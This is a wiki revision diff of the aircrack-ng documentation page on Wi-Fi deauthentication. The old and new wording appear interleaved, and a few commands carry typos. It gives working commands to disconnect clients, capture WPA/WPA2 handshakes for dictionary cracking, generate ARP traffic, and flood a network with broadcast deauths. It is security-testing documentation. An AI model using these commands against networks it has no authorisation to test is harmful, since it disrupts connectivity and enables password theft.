User Tools

Site Tools


deauthentication

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
deauthentication [2007/01/26 19:19]
darkaudax update for v0.7 and expand
deauthentication [2010/11/21 13:34] (current)
sleek typos
Line 1: Line 1:
 ====== Deauthentication ====== ====== Deauthentication ======
  
-=====  ​Usage ​=====+===== Description ​===== 
 +This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. ​ Disassociating clients can be done for a number of reasons:
  
-    * Recovering a hidden ​(not broadcasted) ​ESSID +    * Recovering a hidden ESSID.  This is an ESSID which is not being broadcast. ​ Another term for this is "​cloaked"​. 
-    * Capturing WPA handshakes by forcing clients to reauthenticate+    * Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
     * Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected) ​     * Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected) ​
  
 +Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.
  
-Of course, this attack ​is totally useless ​if there are no associated wireless ​clients.\\ +=====  Usage ===== 
-It is usually more effective ​to target ​specific station using the -c parameter.+ 
 +   ​aireplay-ng -0 1 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​34:​30:​30 ath0 
 + 
 +Where: 
 +  * -0 means deauthentication 
 +  * 1 is the number of deauths to send (you can send multiple ​if you wish); 0 means send them continuously 
 +  * -a 00:​14:​6C:​7E:​40:​80 is the MAC address of the access point 
 +  * -c 00:​0F:​B5:​34:​30:​30 is the MAC address of the client to deauthenticate;​ if this is omitted then all clients ​are deauthenticated 
 +  *ath0 is the interface name 
 + 
 +===== Usage Examples ===== 
 + 
 +==== Typical Deauthentication ==== 
 +First, you determine a client which is currently connected You need the MAC address for the following command: 
 + 
 +   ​aireplay-ng -0 1 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​AE:​CE:​9D ath0 
 + 
 +Where: 
 +  * -0 means deauthentication 
 +  * 1 is the number of deauths ​to send (you can send multiple if you wish) 
 +  * -00:​14:​6C:​7E:​40:​80 is the MAC address of the access point 
 +  * -c 000:​0F:​B5:​AE:​CE:​9D is the MAC address of the client you are deauthing 
 +  * ath0 is the interface name 
 + 
 +Here is typical output: 
 + 
 +   ​12:​35:​25 ​ Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 
 +   ​12:​35:​25 ​ Sending 64 directed DeAuthSTMAC: [00:​0F:​B5:​AE:​CE:​9D] [ 61|63 ACKs] 
 + 
 +For directed deauthentications,​ aireplay-ng sends out a total of 128 packets for each deauth you specify. ​ 64 packets are sent to the AP itself and 64 packets are sent to the client. 
 + 
 +Here is what the "[ 61|63 ACKs]" means: 
 + 
 +  * [ ACKs received from the client | ACKs received from the AP ] 
 +  * You will notice that the number in the example above is lower then 64 which is the number of packets sent.  It is not unusual to lose a few packets. ​ Conversely, if the client was actively communicating at the time, the counts could be greater then 64. 
 +  * How do you use this information? ​ This gives you a good indication if the client and or AP heard the packets you sent.  A zero value definitely tells the client and/or AP did not hear your packets. ​ Very low values likely indicate you are quite a distance and the  signal strength is poor. 
 + 
  
  
-===== WPA Handshake capture with an Atheros ​=====+==== WPA/WPA2 Handshake capture with an Atheros ====
  
   airmon-ng start ath0   airmon-ng start ath0
Line 20: Line 58:
   aircrack-ng -w /​path/​to/​dictionary out.cap   aircrack-ng -w /​path/​to/​dictionary out.cap
  
-Here the explaination ​of the above commands:+Explanation ​of the above:
  
-airodump-ng -c 6 --bssid 00:​14:​6C:​7E:​40:​80 -w out ath0+airodump-ng -c 6 --bssid 00:​14:​6C:​7E:​40:​80 -w out ath0\\
 Where: Where:
   *-c 6 is the channel to listen on   *-c 6 is the channel to listen on
Line 29: Line 67:
   *ath0 is the interface name   *ath0 is the interface name
  
-aireplay-ng -0 5 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​AB:​CB:​9D ath0+aireplay-ng -0 5 -a 00:​14:​6C:​7E:​40:​80 -c 00:​0F:​B5:​AB:​CB:​9D ath0\\
 Where: Where:
   *-0 means deauthentication attack   *-0 means deauthentication attack
Line 45: Line 83:
    ​12:​55:​58 ​ Sending DeAuth to station ​  -- STMAC: [00:​0F:​B5:​AB:​CB:​9D]    ​12:​55:​58 ​ Sending DeAuth to station ​  -- STMAC: [00:​0F:​B5:​AB:​CB:​9D]
  
- +==== ARP request generation with a Prism2 card ====
-===== ARP request generation with a Prism2 card =====+
  
   airmon-ng start wlan0   airmon-ng start wlan0
-  airodump-ng ​wlan0 out 6  (switch to another console)+  airodump-ng ​-c -w out --bssid 00:​13:​10:​30:​24:​9C wlan0  ​(switch to another console)
   aireplay-ng -0 10 -a 00:​13:​10:​30:​24:​9C wlan0   aireplay-ng -0 10 -a 00:​13:​10:​30:​24:​9C wlan0
   aireplay-ng -3 -b 00:​13:​10:​30:​24:​9C -h 00:​09:​5B:​EB:​C5:​2B wlan0   aireplay-ng -3 -b 00:​13:​10:​30:​24:​9C -h 00:​09:​5B:​EB:​C5:​2B wlan0
  
-After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.+After sending the ten batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.
  
 If the driver is [[http://​www.linux-wlan.com/​linux-wlan|wlan-ng]],​ you should run the [[airmon-ng]] script (unless you know what to type) otherwise the card won't be correctly setup for injection. If the driver is [[http://​www.linux-wlan.com/​linux-wlan|wlan-ng]],​ you should run the [[airmon-ng]] script (unless you know what to type) otherwise the card won't be correctly setup for injection.
  
-===== Mass denial-of-service with RT2500 ​card =====+===== Usage Tips ===== 
 + 
 +It is usually more effective to target a specific station using the -c parameter. 
 + 
 +The deauthentication packets are sent directly from your PC to the clients. ​ So you must be physically close enough to the clients for your wireless card transmissions to reach them. 
 + 
 + 
 +===== Usage Troubleshooting ===== 
 + 
 +===== Why does deauthentication not work? ===== 
 + 
 +There can be several reasons and one or more can affect you: 
 + 
 +  * You are physically too far away from the client(s). ​ You need enough transmit power for the packets to reach and be heard by the clients. ​ If you do full packet capture, each packet sent to the client should result in an "​ack"​ packet back.  This means the client heard the packet. ​ If there is no "​ack"​ then likely it did not receive the packet. 
 +  * Wireless cards work in particular modes such b, g, n and so on.  If your card is in a different mode then the client card there is good chance that the client will not be able to correctly receive your transmission. ​ See the previous item for confirming the client received the packet. 
 +  * Some clients ignore broadcast deauthentications. ​ If this is the case, you will need to send a deauthentication directed at the particular client. 
 +  * Clients may reconnect too fast for you to see that they had been disconnected. ​ If you do a full packet capture, you will be able to look for the reassociation packets in the capture to confirm deauthentication worked. 
 + 
 + 
 +===== General ​=====
  
-  airmon-ng start ra0 +See the general aireplay-ng troubleshooting ideas: [[aireplay-ng#​usage_troubleshooting|aireplay-ng usage troubleshooting]].
-  ​aireplay-ng -0 0 -a 00:​13:​10:​30:​24:​9C ra0+
  
-With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected. Sadly, the most up-to-date drivers and firmwares ignore deauthentications sent to broadcasts, so you need to send them directly to them using the -c option as described above. 
deauthentication.1169835562.txt.gz · Last modified: 2007/01/26 19:19 (external edit)